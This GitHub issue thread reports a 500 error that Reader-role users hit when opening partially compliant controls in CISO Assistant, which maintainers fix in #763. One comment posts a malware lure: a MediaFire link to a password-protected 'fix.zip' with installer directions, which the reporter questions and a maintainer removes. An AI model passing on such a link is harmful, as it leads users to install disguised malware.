### ISSUE TITLE
500 error when accessing some controls as a Reader

### ISSUE THREAD

**Issue by CyberPoly1000** [intuitem/ciso-assistant-community#761] opened 2024-08-26 07:12 UTC
**Describe the bug**
When accessing a control of an assessment as a reader, I get a 500 error. The compliant controls do not have this issue, but the partially compliant ones do. I can see two types of error, maybe unrelated but appearing any time I have the issue : 
- In the dev console : 
![image](https://github.com/user-attachments/assets/806f251a-019c-4024-b9bc-64ad15b6acd8)
- In the backend logs : 
![image](https://github.com/user-attachments/assets/3f4d885d-9746-45ed-abe5-b9801a228629)

**To Reproduce**
1. Go to 'Audits' and open an audit you have access to as "Reader"
2. Click on a 'Partially compliant' control
3. Nothing to be displayed and an error in the console appears

**Environment (please complete the following information):**
 - Version 
![image](https://github.com/user-attachments/assets/fbf5c5ad-810a-4eec-a7ee-9bca9296eaa2)

**Comment by Wanderx13** [comment] 2024-08-26 07:13
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by CyberPoly1000** [comment] 2024-08-26 07:32
Trying to make me install weird stuff?

**Comment by ab-smith** [comment] 2024-08-26 08:56
thanks @CyberPoly1000  for your vigilance, I've removed that user content, and feel free to tag me in for suspicious content.
the team will look into your issue and get back to you

**Comment by ab-smith** [comment] 2024-08-26 15:00
could it be related to the body_size limit again @nas-tabchiche ?

**Comment by nas-tabchiche** [comment] 2024-08-26 15:46
@ab-smith This looks like it is related to the recent update to translations. Looking into it.

**Comment by nas-tabchiche** [comment] 2024-08-26 21:12
The issue is fixed by #763. Closing this, thanks for the input @CyberPoly1000

**Closed by nas-tabchiche** 2024-08-26 21:12 UTC
Labels: bug
